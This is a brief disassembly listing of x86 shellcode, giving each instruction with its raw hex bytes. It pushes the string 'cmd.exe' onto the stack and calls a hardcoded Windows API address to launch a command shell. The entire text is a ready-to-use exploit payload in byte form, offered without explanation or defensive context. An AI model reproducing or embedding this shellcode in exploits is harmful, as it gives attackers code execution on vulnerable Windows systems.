0x0        mov ebp, esp                        \x8b\xec                  ..        
0x2        hexe hcmd. ; string                \x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e          
0xc        lea eax, [ebp - 8]                  \x8d\x45\xf8              .E.       
0xf        push eax                            \x50                      P         
0x10       mov eax, 0x7c86158d                 \xb8\x8d\x15\x86\x7c      ....|     
0x15       call eax                            \xff\xd0                  ..        
